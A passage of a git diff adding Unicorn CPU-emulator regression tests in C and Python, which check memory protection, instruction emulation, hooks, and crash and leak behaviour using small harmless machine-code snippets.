+ printf("Failed to write emulation code to memory, quit!\n"); + return 2; + } else { + printf("Allowed to write to read only memory via uc_mem_write\n"); + } + + uc_mem_write(uc, 0x300000, (const uint8_t*)"\x41\x41\x41\x41", 4); + uc_mem_write(uc, 0x400000, (const uint8_t*)"\x42\x42\x42\x42", 4); + + //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff); + + // intercept invalid memory events + uc_hook_add(uc, &trace1, UC_MEM_READ_PROT, hook_mem_invalid, NULL, 1, 0); + + // emulate machine code in infinite time + printf("BEGIN execution\n"); + err = uc_emu_start(uc, 0x100000, 0x100000 + sizeof(PROGRAM), 0, 2); + if (err) { + printf("Expected failure on uc_emu_start() with error returned %u: %s\n", 
+ err, uc_strerror(err)); + } else { + printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); + } + printf("END execution\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &eax); + printf("Final eax = 0x%x\n", eax); + uc_reg_read(uc, UC_X86_REG_EBX, &ebx); + printf("Final ebx = 0x%x\n", ebx); + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/osx_qemu_thread_create_crash.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/osx_qemu_thread_create_crash.py new file mode 100644 index 0000000..b34b319 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/osx_qemu_thread_create_crash.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python + +import platform +import resource + +from unicorn import * + +import regress + +# OS X: OK with 2047 iterations. +# OS X: Crashes at 2048:th iteration ("qemu: qemu_thread_create: Resource temporarily unavailable"). +# Linux: No crashes observed. +class ThreadCreateCrash(regress.RegressTest): + def test(self): + for i in xrange(2048): + Uc(UC_ARCH_X86, UC_MODE_64) + self.assertTrue(True, "If not reached, then we have a crashing bug.") + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/potential_memory_leak.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/potential_memory_leak.py new file mode 100644 index 0000000..29a2998 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/potential_memory_leak.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +import platform +import resource + +from unicorn import * + +import regress + +class MemoryLeak(regress.RegressTest): + def test(self): + if platform.system() == "Darwin": + rusage_multiplier = 1 + elif platform.system() == "Linux": + rusage_multiplier = 1024 + else: + # resource.getrusage(...) is platform dependent. Only tested under OS X and Linux. 
+ return + max_rss_before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier + for i in xrange(10000): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0, 4096) + mu.emu_start(0, 0) + max_rss_after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier + rss_increase_per_iteration = (max_rss_after - max_rss_before) / i + self.assertLess(rss_increase_per_iteration, 8000) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/pshufb.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/pshufb.py new file mode 100644 index 0000000..4e60b7d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/pshufb.py @@ -0,0 +1,21 @@ +#!/usr/bin/python +# By Ryan Hileman, issue #91 + +# Invalid instruction = test failed + +from unicorn import * +from unicorn.x86_const import * + +import regress + +class Pshufb(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + uc.mem_map(0x2000, 0x1000) + # pshufb xmm0, xmm1 + uc.mem_write(0x2000, '660f3800c1'.decode('hex')) + uc.emu_start(0x2000, 0x2005) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/reg_write_sign_extension.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/reg_write_sign_extension.py new file mode 100644 index 0000000..b7d3be5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/reg_write_sign_extension.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +"""See https://github.com/unicorn-engine/unicorn/issues/98""" + +import unicorn +import regress + +ADDR = 0xffaabbcc + +def hook_mem_invalid(mu, access, address, size, value, user_data): + print ">>> Access type: %u, expected value: 0x%x, actual value: 0x%x" % (access, ADDR, address) + assert(address == ADDR) + mu.mem_map(address & 0xfffff000, 4 * 1024) + mu.mem_write(address, b'\xcc') + return True + +class RegWriteSignExt(regress.RegressTest): 
+ + def runTest(self): + mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) + mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, ADDR) + + mu.mem_map(0x10000000, 1024 * 4) + # jmp ebx + mu.mem_write(0x10000000, b'\xff\xe3') + + mu.hook_add(unicorn.UC_HOOK_MEM_FETCH_UNMAPPED | unicorn.UC_HOOK_MEM_FETCH_PROT, hook_mem_invalid) + mu.emu_start(0x10000000, 0x10000000 + 2, count=1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.py new file mode 100644 index 0000000..2e4f253 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.py @@ -0,0 +1,34 @@ +#!/usr/bin/python + +import unittest + +from os.path import dirname, basename, isfile +import glob + +# Find all unittest type in this directory and run it. + +class RegressTest(unittest.TestCase): + pass + +def main(): + unittest.main() + +if __name__ == '__main__': + directory = dirname(__file__) + if directory == '': + directory = '.' 
+ modules = glob.glob(directory+"/*.py") + __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] + suite = unittest.TestSuite() + + for module in __all__: + m = __import__(module) + for cl in dir(m): + try: + realcl = getattr(m,cl) + if issubclass(realcl, unittest.TestCase): + suite.addTest(realcl()) + except Exception as e: + pass + + unittest.TextTestRunner().run(suite) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.sh b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.sh new file mode 100644 index 0000000..0c05699 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/regress.sh @@ -0,0 +1,22 @@ +#!/bin/sh + + +./map_crash +./map_write +./sigill +./sigill2 +./block_test +./ro_mem_test +./nr_mem_test +./timeout_segfault +./rep_movsb +./mem_unmap +./mem_protect +./mem_exec +./mem_map_large +./00opcode_uc_crash +./eflags_noset +./eflags_nosync +./mips_kseg0_1 +./mem_double_unmap + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_hook.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_hook.py new file mode 100644 index 0000000..493c0d1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_hook.py @@ -0,0 +1,30 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * +import regress + +PAGE_SIZE = 4 * 1024 + +CODE = b'\xf3\xaa' # rep stosb + + +def hook_code(uc, addr, size, user_data): + print("hook called at %x" %addr) + +class REP(regress.RegressTest): + + def test_rep(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + mu.mem_map(0, PAGE_SIZE) + mu.mem_write(0, CODE) + mu.reg_write(UC_X86_REG_ECX, 3) + mu.reg_write(UC_X86_REG_EDI, 0x100) + mu.hook_add(UC_HOOK_CODE, hook_code) + + mu.emu_start(0, len(CODE)) + self.assertEqual(0, mu.reg_read(UC_X86_REG_ECX)) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_movsb.c 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_movsb.c new file mode 100644 index 0000000..436a02b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/rep_movsb.c @@ -0,0 +1,182 @@ +/* + +rep movsb regression + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +#define __STDC_FORMAT_MACROS +#include +#include +#include +#include + +#include + +unsigned char PROGRAM[] = + "\xbe\x00\x00\x20\x00\xbf\x00\x10\x20\x00\xb9\x14\x00\x00\x00\xf3" + "\xa4\xf4"; +// total size: 18 bytes + +/* +bits 32 + +; assumes code section at 0x100000 r-x +; assumes data section at 0x200000-0x202000, rw- + +mov esi, 0x200000 +mov edi, 0x201000 +mov ecx, 20 +rep movsb +hlt +*/ + +static int log_num = 1; + +// callback for tracing instruction +static void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) +{ + uint8_t opcode; + if (uc_mem_read(uc, addr, &opcode, 1) != UC_ERR_OK) { + printf("not ok %d - uc_mem_read fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); + _exit(-1); + } + switch (opcode) { + case 0xf4: //hlt + printf("# Handling HLT\n"); + if (uc_emu_stop(uc) != UC_ERR_OK) { + printf("not ok %d - uc_emu_stop fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); + _exit(-1); + } + else { + printf("ok %d - hlt encountered, uc_emu_stop called\n", log_num++); + } + break; + 
default: //all others + break; + } +} + +// callback for tracing memory access (READ or WRITE) +static void hook_mem_write(uc_engine *uc, uc_mem_type type, + uint64_t addr, int size, int64_t value, void *user_data) +{ + printf("# write to memory at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", addr, size, value); + if (addr < 0x201000L) { + //this is actually a read, we don't write in this range + printf("not ok %d - write hook called for read of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); + } + else { + printf("ok %d - write hook called for write of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); + } +} + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_hook trace1, trace2; + uc_err err; + uint8_t buf1[100], readbuf[100]; + + printf("# rep movsb test\n"); + + memset(buf1, 'A', 20); + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("not ok %d - Failed on uc_open() with error returned: %u\n", log_num++, err); + return 1; + } + else { + printf("ok %d - uc_open() success\n", log_num++); + } + + uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); + uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_READ | UC_PROT_WRITE); + + // fill in the data that we want to copy + if (uc_mem_write(uc, 0x200000, buf1, 20)) { + printf("not ok %d - Failed to write read buffer to memory, quit!\n", log_num++); + return 2; + } + else { + printf("ok %d - Read buffer written to memory\n", log_num++); + } + + // write machine code to be emulated to memory + if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { + printf("not ok %d - Failed to write emulation code to memory, quit!\n", log_num++); + return 4; + } + else { + printf("ok %d - Program written to memory\n", log_num++); + } + + if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK) { + printf("not ok %d - Failed to install 
UC_HOOK_CODE handler\n", log_num++); + return 5; + } + else { + printf("ok %d - UC_HOOK_CODE installed\n", log_num++); + } + + // intercept memory write events only, NOT read events + if (uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE, hook_mem_write, NULL, 1, 0) != UC_ERR_OK) { + printf("not ok %d - Failed to install UC_HOOK_MEM_WRITE handler\n", log_num++); + return 6; + } + else { + printf("ok %d - UC_HOOK_MEM_WRITE installed\n", log_num++); + } + + // emulate machine code until told to stop by hook_code + printf("# BEGIN execution\n"); + err = uc_emu_start(uc, 0x100000, 0x101000, 0, 0); + if (err != UC_ERR_OK) { + printf("not ok %d - Failure on uc_emu_start() with error %u:%s\n", log_num++, err, uc_strerror(err)); + return 8; + } + else { + printf("ok %d - uc_emu_start complete\n", log_num++); + } + printf("# END execution\n"); + + //make sure that data got copied + // fill in sections that shouldn't get touched + if (uc_mem_read(uc, 0x201000, readbuf, 20)) { + printf("not ok %d - Failed to read random buffer 1 from memory\n", log_num++); + } + else { + printf("ok %d - Random buffer 1 read from memory\n", log_num++); + if (memcmp(buf1, readbuf, 20)) { + printf("not ok %d - write buffer contents are incorrect\n", log_num++); + } + else { + printf("ok %d - write buffer contents are correct\n", log_num++); + } + } + + if (uc_close(uc) == UC_ERR_OK) { + printf("ok %d - uc_close complete\n", log_num++); + } + else { + printf("not ok %d - uc_close complete\n", log_num++); + } + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/ro_mem_test.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ro_mem_test.c new file mode 100644 index 0000000..0197877 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ro_mem_test.c @@ -0,0 +1,209 @@ +/* +Non-writable memory test case + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public 
License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +#include + +#include + +const uint8_t PROGRAM[] = + "\xeb\x1a\x58\x83\xc0\x04\x83\xe0\xfc\x83\xc0\x01\xc7\x00\x78\x56" + "\x34\x12\x83\xc0\x07\xc7\x00\x21\x43\x65\x87\x90\xe8\xe1\xff\xff" + "\xff" "xxxxAAAAxxxBBBB"; +// total size: 33 bytes + +/* + jmp short bottom +top: + pop eax + add eax, 4 + and eax, 0xfffffffc + add eax, 1 ; unaligned + mov dword [eax], 0x12345678 ; try to write into code section + add eax, 7 ; aligned + mov dword [eax], 0x87654321 ; try to write into code section + nop +bottom: + call top +*/ + +// callback for tracing instruction +/*static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + uint32_t esp; + printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); + + uc_reg_read(uc, UC_X86_REG_ESP, &esp); + printf(">>> --- ESP is 0x%x\n", esp); + +} +*/ + +// callback for tracing memory access (READ or WRITE) +static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) +{ + uint32_t esp; + uc_reg_read(uc, UC_X86_REG_ESP, &esp); + + switch(type) { + default: + // return false to indicate we want to stop emulation + return false; + case UC_MEM_WRITE: + //if this is a push, esp has not been adjusted yet + if (esp == (address + size)) { + uint32_t upper; + upper = (esp + 0xfff) & ~0xfff; + printf(">>> Stack appears to be missing at 0x%"PRIx64 ", allocating now\n", address); + // map this memory in with 
2MB in size + uc_mem_map(uc, upper - 0x8000, 0x8000, UC_PROT_READ | UC_PROT_WRITE); + // return true to indicate we want to continue + return true; + } + printf(">>> Missing memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", + address, size, value); + return false; + case UC_MEM_WRITE_PROT: + printf(">>> RO memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", + address, size, value); + return false; + } +} + + +#define STACK 0x500000 +#define STACK_SIZE 0x5000 + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_hook trace1; + uc_err err; + uint8_t bytes[8]; + uint32_t esp; + int map_stack = 0; + + if (argc == 2 && strcmp(argv[1], "--map-stack") == 0) { + map_stack = 1; + } + + printf("Memory mapping test\n"); + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u\n", err); + return 1; + } + + uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_ALL); + uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_ALL); + uc_mem_map(uc, 0x300000, 0x3000, UC_PROT_ALL); + uc_mem_map(uc, 0x400000, 0x4000, UC_PROT_READ); + + if (map_stack) { + printf("Pre-mapping stack\n"); + uc_mem_map(uc, STACK, STACK_SIZE, UC_PROT_READ | UC_PROT_WRITE); + } else { + printf("Mapping stack on first invalid memory access\n"); + } + + esp = STACK + STACK_SIZE; + + uc_reg_write(uc, UC_X86_REG_ESP, &esp); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, 0x400000, PROGRAM, sizeof(PROGRAM))) { + printf("Failed to write emulation code to memory, quit!\n"); + return 2; + } else { + printf("Allowed to write to read only memory via uc_mem_write\n"); + } + + //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff); + + // intercept invalid memory events + uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_WRITE_PROT, hook_mem_invalid, NULL, 1, 0); + + // emulate machine code in 
infinite time + printf("BEGIN execution - 1\n"); + err = uc_emu_start(uc, 0x400000, 0x400000 + sizeof(PROGRAM), 0, 10); + if (err) { + printf("Expected failue on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } else { + printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); + } + printf("END execution - 1\n"); + + // emulate machine code in infinite time + printf("BEGIN execution - 2\n"); + //update eax to point to aligned memory (same as add eax,7 above) + uint32_t eax = 0x40002C; + uc_reg_write(uc, UC_X86_REG_EAX, &eax); + //resume execution at the mov dword [eax], 0x87654321 + //to test an aligned write as well + err = uc_emu_start(uc, 0x400015, 0x400000 + sizeof(PROGRAM), 0, 2); + if (err) { + printf("Expected failure on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } else { + printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); + } + printf("END execution - 2\n"); + + printf("Verifying content at 0x400025 is unchanged\n"); + if (!uc_mem_read(uc, 0x400025, bytes, 4)) { + printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x400025, *(uint32_t*) bytes); + if (0x41414141 != *(uint32_t*) bytes) { + printf("ERROR content in read only memory changed\n"); + } else { + printf("SUCCESS content in read only memory unchanged\n"); + } + } else { + printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); + return 4; + } + + printf("Verifying content at 0x40002C is unchanged\n"); + if (!uc_mem_read(uc, 0x40002C, bytes, 4)) { + printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x40002C, *(uint32_t*) bytes); + if (0x42424242 != *(uint32_t*) bytes) { + printf("ERROR content in read only memory changed\n"); + } else { + printf("SUCCESS content in read only memory unchanged\n"); + } + } else { + printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); + return 4; + } + + printf("Verifying content at bottom of stack is readable and correct\n"); + if (!uc_mem_read(uc, esp - 4, 
bytes, 4)) { + printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)(esp - 4), *(uint32_t*) bytes); + } else { + printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); + return 4; + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/run_across_bb.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/run_across_bb.py new file mode 100644 index 0000000..074db4d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/run_across_bb.py @@ -0,0 +1,195 @@ +#!/usr/bin/python +# +# This test demonstrates emulation behavior within and across +# basic blocks. + +from __future__ import print_function +import binascii +import regress +import struct + +from unicorn import * +from unicorn.x86_const import * + + +CODE = binascii.unhexlify(b"".join([ + b"b800000000", # 1000: b8 00 00 00 00 mov eax,0x0 + b"40", # 1005: 40 inc eax + b"40", # 1006: 40 inc eax + b"6810100000", # 1007: 68 10 10 00 00 push 0x1010 + b"c3", # 100c: c3 ret + b"cc", # 100d: cc int3 + b"cc", # 100e: cc int3 + b"cc", # 100f: cc int3 + b"b800000000", # 1010: b8 00 00 00 00 mov eax,0x0 + b"40", # 1015: 40 inc eax + b"40", # 1016: 40 inc eax + ])) + + +def showpc(mu): + pc = mu.reg_read(UC_X86_REG_EIP) + print("pc: 0x%x" % (pc)) + + +class RunAcrossBBTest(regress.RegressTest): + def test_run_all(self): + try: + ####################################################################### + # emu SETUP + ####################################################################### + print("\n---- test: run_all ----") + + + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + mu.hook_add(UC_HOOK_CODE, hook_code) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + + # stack + mu.mem_map(0x2000, 0x1000) + + mu.reg_write(UC_X86_REG_EIP, 0x1000) + mu.reg_write(UC_X86_REG_ESP, 0x2800) + 
self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") + self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") + showpc(mu) + + mu.emu_start(0x1000, 0x1016) + # should exec the following four instructions: + # 1000: b8 00 00 00 00 mov eax,0x0 < + # 1005: 40 inc eax < + # 1006: 40 inc eax < + # 1007: 68 10 10 00 00 push 0x1010 < + # 100c: c3 ret -----------+ + # 100d: cc int3 | + # 100e: cc int3 | + # 100f: cc int3 | + # 1010: b8 00 00 00 00 mov eax,0x0 <-+ + # 1015: 40 inc eax < + # 1016: 40 inc eax < + self.assertEqual(0x1016, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") + self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") + showpc(mu) + + except UcError as e: + if e.errno == UC_ERR_FETCH_UNMAPPED: + # during initial test dev, bad fetch at 0x1010, but the data is there, + # and this proves it + print("!!! about to bail due to bad fetch... here's the data at PC:") + print(binascii.hexlify(mu.mem_read(mu.reg_read(UC_X86_REG_EIP), 0x8))) + + self.assertFalse(True, "ERROR: %s @ 0x%x" % (e, mu.reg_read(UC_X86_REG_EIP))) + + + + def test_run_across_bb(self): + try: + ####################################################################### + # emu SETUP + ####################################################################### + print("\n---- test: run_across_bb ----") + + + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + mu.hook_add(UC_HOOK_CODE, hook_code) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + + # stack + mu.mem_map(0x2000, 0x1000) + + mu.reg_write(UC_X86_REG_EIP, 0x1000) + mu.reg_write(UC_X86_REG_ESP, 0x2800) + self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") + self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") + showpc(mu) + + + ####################################################################### + # 
emu_run ONE: + # exectue four instructions, until the last instruction in a BB + ####################################################################### + + + mu.emu_start(0x1000, 0x100c) + # should exec the following four instructions: + # 1000: b8 00 00 00 00 mov eax,0x0 < + # 1005: 40 inc eax < + # 1006: 40 inc eax < + # 1007: 68 10 10 00 00 push 0x1010 < + + # should be at 0x100c, as requested + self.assertEqual(0x100c, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") + + # single push, so stack diff is 0x4 + TOP_OF_STACK = 0x2800-0x4 + self.assertEqual(TOP_OF_STACK, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") + + # top of stack should be 0x1010 + self.assertEqual(0x1010, + struct.unpack(" +#include +#include + +#define ADDRESS 0x1000000 +#define STACK 0x0020D000 +#define STACK2 0x0030D000 +#define STACK_SIZE 16384 +#define SIZE (2 * 1024 * 1024) +#define CODE32 "\x8B\x04\x24\xA3\x40\x00\x00\x01\xA1\x40\x00\x00\x01" + +bool hook_mem_rw(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) +{ + unsigned int EIP; + + uc_reg_read(uc, UC_X86_REG_EIP, &EIP); + switch(type) + { + default: + return false; + break; + case UC_MEM_WRITE: + printf("Hooked write to address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); + + return true; + break; + case UC_MEM_READ: + printf("Hooked read from address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); + + return true; + break; + } +} + +int main(int argc, char *argv[]) +{ + uc_engine *uc; + uc_hook trace; + uc_err err; + unsigned int EAX, ESP, val = 0x0c0c0c0c, stkval = STACK; + + EAX = 0; + ESP = STACK+0x4; + + // Initialize emulator in X86-64bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return 1; + } + + err = uc_mem_map(uc, ADDRESS, SIZE, UC_PROT_ALL); + if(err != UC_ERR_OK) { + printf("Failed to map memory %s\n", 
uc_strerror(err)); + return 1; + } + + err = uc_mem_write(uc, ADDRESS, CODE32, sizeof(CODE32) - 1); + if(err != UC_ERR_OK) { + printf("Failed to write to memory %s\n", uc_strerror(err)); + return 1; + } + +loop: + err = uc_mem_map(uc, stkval, STACK_SIZE, UC_PROT_ALL); + if(err != UC_ERR_OK) { + printf("Failed to map memory %s\n", uc_strerror(err)); + return 1; + } + + err = uc_mem_write(uc, ESP, &val, sizeof(val)); + if(err != UC_ERR_OK) { + printf("Failed to write to memory %s\n", uc_strerror(err)); + return 1; + } + + + uc_hook_add(uc, &trace, UC_HOOK_MEM_WRITE | UC_HOOK_MEM_READ, (void *)hook_mem_rw, NULL, 1, 0); + + uc_reg_write(uc, UC_X86_REG_EAX, &EAX); + uc_reg_write(uc, UC_X86_REG_ESP, &ESP); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(CODE32) - 1), 0, 0); + if(err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return 1; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &EAX); + + printf(">>> EAX = %08X\n", EAX); + + if(stkval != STACK2) + { + printf("=== Beginning test two ===\n"); + ESP = STACK2+0x4; + EAX = 0; + stkval = STACK2; + goto loop; + } + + uc_close(uc); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/segfault_on_stop.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/segfault_on_stop.py new file mode 100644 index 0000000..8d57710 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/segfault_on_stop.py @@ -0,0 +1,13 @@ +#!/usr/bin/env python + +import regress +import unicorn + + +class SegfaultOnStop(regress.RegressTest): + def test(self): + unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_64).emu_stop() + self.assertTrue(True, "If not reached, then we have a crashing bug.") + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill.c new file mode 100644 index 0000000..9e5061d --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill.c @@ -0,0 +1,47 @@ +#include +#include +#include +#include + +#define UC_BUG_WRITE_SIZE 128 +#define UC_BUG_WRITE_ADDR 0x1000 // fix this by change this to 0x2000 + +int got_sigill = 0; + +void _interrupt(uc_engine *uc, uint32_t intno, void *user_data) +{ + if (intno == 6) { + uc_emu_stop(uc); + got_sigill = 1; + } +} + +int main() +{ + int size; + uint8_t *buf; + uc_engine *uc; + uc_hook uh_trap; + uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + fprintf (stderr, "Cannot initialize unicorn\n"); + return 1; + } + size = UC_BUG_WRITE_SIZE; + buf = malloc (size); + if (!buf) { + fprintf (stderr, "Cannot allocate\n"); + return 1; + } + memset (buf, 0, size); + if (!uc_mem_map(uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { + uc_mem_write(uc, UC_BUG_WRITE_ADDR, + (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); + } + uc_hook_add(uc, &uh_trap, UC_HOOK_INTR, _interrupt, NULL, 1, 0); + uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); + uc_close(uc); + free(buf); + printf ("Correct: %s\n", got_sigill? "YES": "NO"); + return got_sigill? 
